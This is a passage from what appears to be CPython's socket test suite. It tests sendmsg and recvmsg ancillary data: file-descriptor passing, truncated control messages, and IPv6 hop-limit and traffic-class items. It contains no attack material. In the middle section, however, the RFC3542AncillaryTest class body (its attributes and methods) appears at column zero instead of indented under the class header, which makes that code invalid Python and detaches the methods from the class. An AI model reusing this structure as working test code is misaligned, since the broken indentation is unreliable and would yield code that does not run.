        self.checkRecvmsgFDs(
            4, self.doRecvmsg(self.serv_sock, len(MSG),
                              socket.CMSG_SPACE(4 * SIZEOF_INT)))

    @testFDPassCMSG_SPACE.client_skip
    def _testFDPassCMSG_SPACE(self):
        self.createAndSendFDs(4)

    def testFDPassCMSG_LEN(self):
        # Test using CMSG_LEN() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(1,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_LEN(4 * SIZEOF_INT)),
                             # RFC 3542 says implementations may set
                             # MSG_CTRUNC if there isn't enough space
                             # for trailing padding.
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassCMSG_LEN(self):
        self.createAndSendFDs(1)

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparate(self):
        # Pass two FDs in two separate arrays.  Arrays may be combined
        # into a single control message by the OS.
        self.checkRecvmsgFDs(2,
                             self.doRecvmsg(self.serv_sock, len(MSG), 10240),
                             maxcmsgs=2)

    @testFDPassSeparate.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparate(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparateMinSpace(self):
        # Pass two FDs in two separate arrays, receiving them into the
        # minimum space for two arrays.
        num_fds = 2
        self.checkRecvmsgFDs(num_fds,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_SPACE(SIZEOF_INT) +
                                            socket.CMSG_LEN(SIZEOF_INT * num_fds)),
                             maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)

    @testFDPassSeparateMinSpace.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparateMinSpace(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd1]))]),
            len(MSG))

    def sendAncillaryIfPossible(self, msg, ancdata):
        # Try to send msg and ancdata to server, but if the system
        # call fails, just send msg with no ancillary data.
        try:
            nbytes = self.sendmsgToServer([msg], ancdata)
        except OSError as e:
            # Check that it was the system call that failed
            self.assertIsInstance(e.errno, int)
            nbytes = self.sendmsgToServer([msg])
        self.assertEqual(nbytes, len(msg))

    @unittest.skipIf(sys.platform == "darwin", "see issue #24725")
    def testFDPassEmpty(self):
        # Try to pass an empty FD array.  Can receive either no array
        # or an empty array.
        self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240),
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassEmpty(self):
        self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
                                            socket.SCM_RIGHTS,
                                            b"")])

    def testFDPassPartialInt(self):
        # Try to pass a truncated FD array.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 1)
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            # The truncated item must carry less than one whole int.
            self.assertLess(len(cmsg_data), SIZEOF_INT)

    def _testFDPassPartialInt(self):
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [self.badfd]).tobytes()[:-1])])

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassPartialIntInMiddle(self):
        # Try to pass two FD arrays, the first of which is truncated.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 2)
        fds = array.array("i")
        # Arrays may have been combined in a single control message
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            fds.frombytes(cmsg_data[:
                    len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.assertLessEqual(len(fds), 2)
        self.checkFDs(fds)

    @testFDPassPartialIntInMiddle.client_skip
    def _testFDPassPartialIntInMiddle(self):
        fd0, fd1 = self.newFDs(2)
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
             (socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd1]))])

    def checkTruncatedHeader(self, result, ignoreflags=0):
        # Check that no ancillary data items are returned when data is
        # truncated inside the cmsghdr structure.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no buffer size
        # is specified.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
                                  # BSD seems to set MSG_CTRUNC only
                                  # if an item has been partially
                                  # received.
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTruncNoBufSize(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc0(self):
        # Check that no ancillary data is received when buffer size is 0.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTrunc0(self):
        self.createAndSendFDs(1)

    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.

    def testCmsgTrunc1(self):
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))

    def _testCmsgTrunc1(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc2Int(self):
        # The cmsghdr structure has at least three members, two of
        # which are ints, so we still shouldn't see any ancillary
        # data.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 SIZEOF_INT * 2))

    def _testCmsgTrunc2Int(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Minus1(self):
        # One byte short of an empty cmsg: header cannot fit at all.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 socket.CMSG_LEN(0) - 1))

    def _testCmsgTruncLen0Minus1(self):
        self.createAndSendFDs(1)

    # The following tests try to truncate the control message in the
    # middle of the FD array.

    def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
        # Check that file descriptor data is truncated to between
        # mindata and maxdata bytes when received with buffer size
        # ancbuf, and that any complete file descriptor numbers are
        # valid.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbuf)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        if mindata == 0 and ancdata == []:
            return
        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.SOL_SOCKET)
        self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
        self.assertGreaterEqual(len(cmsg_data), mindata)
        self.assertLessEqual(len(cmsg_data), maxdata)
        fds = array.array("i")
        # Decode only the complete ints in the (possibly truncated) data.
        fds.frombytes(cmsg_data[:
                len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.checkFDs(fds)

    def testCmsgTruncLen0(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)

    def _testCmsgTruncLen0(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Plus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)

    def _testCmsgTruncLen0Plus1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
                                 maxdata=SIZEOF_INT)

    def _testCmsgTruncLen1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen2Minus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
                                 maxdata=(2 * SIZEOF_INT) - 1)

    def _testCmsgTruncLen2Minus1(self):
        self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
    # Build a {(cmsg_level, cmsg_type): cmsg_data} mapping from the
    # given ancillary data list, asserting along the way that each
    # (level, type) pair appears at most once.
    mapping = {}
    for level, msg_type, data in ancdata:
        self.assertNotIn((level, msg_type), mapping)
        mapping[(level, msg_type)] = data
    return mapping
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
    # Receive hop limit into ancbufsize bytes of ancillary data
    # space.  Check that data is MSG, ancillary data is not
    # truncated (but ignore any flags in ignoreflags), and hop
    # limit is between 0 and maxhop inclusive.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    # Signal the client that ancillary data will now be delivered.
    self.misc_event.set()
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), ancbufsize)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)

    # Expect exactly one control message: (IPPROTO_IPV6, IPV6_HOPLIMIT)
    # carrying a single native int.
    self.assertEqual(len(ancdata), 1)
    self.assertIsInstance(ancdata[0], tuple)
    cmsg_level, cmsg_type, cmsg_data = ancdata[0]
    self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
    self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
    self.assertIsInstance(cmsg_data, bytes)
    self.assertEqual(len(cmsg_data), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(cmsg_data)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
    # Test receiving the packet hop limit as ancillary data.
    self.checkHopLimit(ancbufsize=10240)

@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
    # Need to wait until server has asked to receive ancillary
    # data, as implementations are not required to buffer it
    # otherwise.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
    # Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
    self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))

@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
    # Test setting hop limit on outgoing packet and receiving it
    # at the other end.
    self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)

@testSetHopLimit.client_skip
def _testSetHopLimit(self):
    # Wait until the server has enabled IPV6_RECVHOPLIMIT, then send
    # MSG with an explicit hop-limit control message attached.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.assertEqual(
        self.sendmsgToServer([MSG],
                             [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                               array.array("i", [self.hop_limit]))]),
        len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
                                 ignoreflags=0):
    # Receive traffic class and hop limit into ancbufsize bytes of
    # ancillary data space.  Check that data is MSG, ancillary
    # data is not truncated (but ignore any flags in ignoreflags),
    # and traffic class and hop limit are in range (hop limit no
    # more than maxhop).
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVTCLASS, 1)
    # Signal the client that ancillary data will now be delivered.
    self.misc_event.set()
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), ancbufsize)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)
    self.assertEqual(len(ancdata), 2)
    ancmap = self.ancillaryMapping(ancdata)

    # Traffic class: a single native int in 0..255.
    tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
    self.assertEqual(len(tcdata), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(tcdata)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], 255)

    # Hop limit: a single native int in 0..maxhop.
    hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
    self.assertEqual(len(hldata), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(hldata)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
    # Test receiving traffic class and hop limit as ancillary data.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240)

@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
    # Test receiving traffic class and hop limit, using
    # CMSG_SPACE() to calculate buffer size.
    self.checkTrafficClassAndHopLimit(
        ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)

@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
    # Test setting traffic class and hop limit on outgoing packet,
    # and receiving them at the other end.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                      maxhop=self.hop_limit)

@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
    # Wait until the server has enabled ancillary-data reception,
    # then send MSG with both control messages attached.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.assertEqual(
        self.sendmsgToServer([MSG],
                             [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                               array.array("i", [self.traffic_class])),
                              (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                               array.array("i", [self.hop_limit]))]),
        len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
    # Try to send ancillary data with first item one byte too
    # long.  Fall back to sending with correct size if this fails,
    # and check that second item was handled correctly.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                      maxhop=self.hop_limit)

@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    try:
        # First attempt: traffic-class item padded with one extra byte.
        nbytes = self.sendmsgToServer(
            [MSG],
            [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
              array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
             (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
              array.array("i", [self.hop_limit]))])
    except OSError as e:
        # The OS rejected the odd size; verify the system call failed
        # (rather than some other error) and retry with exact sizes.
        self.assertIsInstance(e.errno, int)
        nbytes = self.sendmsgToServer(
            [MSG],
            [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
              array.array("i", [self.traffic_class])),
             (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
              array.array("i", [self.hop_limit]))])
    self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
    # Receive hop limit into ancbufsize bytes of ancillary data
    # space, which should be too small to contain the ancillary
    # data header (if ancbufsize is None, pass no second argument
    # to recvmsg()).  Check that data is MSG, MSG_CTRUNC is set
    # (unless included in ignoreflags), and no ancillary data is
    # returned.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    # Signal the client that ancillary data delivery is now enabled.
    self.misc_event.set()
    args = () if ancbufsize is None else (ancbufsize,)
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), *args)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.assertEqual(ancdata, [])
    self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
    # Check that no ancillary data is received when no ancillary
    # buffer size is provided.
    self.checkHopLimitTruncatedHeader(ancbufsize=None,
                                      # BSD seems to set
                                      # MSG_CTRUNC only if an item
                                      # has been partially
                                      # received.
                                      ignoreflags=socket.MSG_CTRUNC)

@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
    # Check that no ancillary data is received when ancillary
    # buffer size is zero.
    self.checkHopLimitTruncatedHeader(ancbufsize=0,
                                      ignoreflags=socket.MSG_CTRUNC)

@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
    # A one-byte buffer is too small even for the cmsg header.
    self.checkHopLimitTruncatedHeader(ancbufsize=1)

@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
    # Wait until the server has enabled ancillary-data reception.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
    # Two ints' worth of space is still less than a full cmsg
    # header on common platforms.
    self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)

@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
    # CMSG_LEN(0) is the size of a bare cmsg header; one byte less
    # cannot hold even an empty message.
    self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)

@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
    # Test truncation of a control message inside its associated
    # data.  The message may be returned with its data truncated,
    # or not returned at all.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    self.misc_event.set()
    # Buffer is one byte short of the space needed for a single-int
    # control message.
    msg, ancdata, flags, addr = self.doRecvmsg(
        self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

    # Either zero or one (truncated) item may come back.
    self.assertLessEqual(len(ancdata), 1)
    if ancdata:
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
        # Data must have been truncated below a full int.
        self.assertLess(len(cmsg_data), SIZEOF_INT)

@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
    # Receive traffic class and hop limit into ancbufsize bytes of
    # ancillary data space, which should be large enough to
    # contain the first item, but too small to contain the header
    # of the second.  Check that data is MSG, MSG_CTRUNC is set
    # (unless included in ignoreflags), and only one ancillary
    # data item is returned.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVTCLASS, 1)
    # Unblock the client thread, which waits before sending MSG.
    self.misc_event.set()
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), ancbufsize)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)

    self.assertEqual(len(ancdata), 1)
    cmsg_level, cmsg_type, cmsg_data = ancdata[0]
    self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
    # Which of the two items arrives first is not specified.
    self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
    self.assertEqual(len(cmsg_data), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(cmsg_data)
    # Both traffic class and hop limit fit in one byte.
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.

@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
    # Exactly one item's worth of space: zero bytes left for the
    # second item's header.
    self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
                                    ignoreflags=socket.MSG_CTRUNC)

@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
    # One byte of room after the first item: too small for the
    # second item's header.
    self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)

@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
    # Two ints of room after the first item: still less than a
    # full cmsg header on common platforms.
    self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                    2 * SIZEOF_INT)

@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
    # One byte short of a bare cmsg header for the second item.
    self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                    socket.CMSG_LEN(0) - 1)

@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
# NOTE(review): "Secomd" below is a typo for "Second"; it appears to
# match the upstream CPython test suite, and renaming it would change
# the test IDs, so the name is kept as-is.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
    # Test truncation of the second of two control messages inside
    # its associated data.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVTCLASS, 1)
    self.misc_event.set()
    # Room for the first item plus one byte less than the second
    # item's full length.
    msg, ancdata, flags, addr = self.doRecvmsg(
        self.serv_sock, len(MSG),
        socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

    cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}

    # First item must be complete; remove its type from the
    # expected set so the second item must be the other type.
    cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
    self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
    cmsg_types.remove(cmsg_type)
    self.assertEqual(len(cmsg_data), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(cmsg_data)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], 255)

    # The second item, if returned at all, must be truncated.
    if ancdata:
        cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        cmsg_types.remove(cmsg_type)
        self.assertLess(len(cmsg_data), SIZEOF_INT)

    self.assertEqual(ancdata, [])

@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
# Derive concrete test classes for different socket types.

class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
                             SendrecvmsgConnectionlessBase,
                             ThreadedSocketTestMixin, UDPTestBase):
    # Combines the datagram-flag, connectionless and threaded mixins
    # over an IPv4 UDP socket; all behaviour comes from the bases.
    pass


@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
    pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
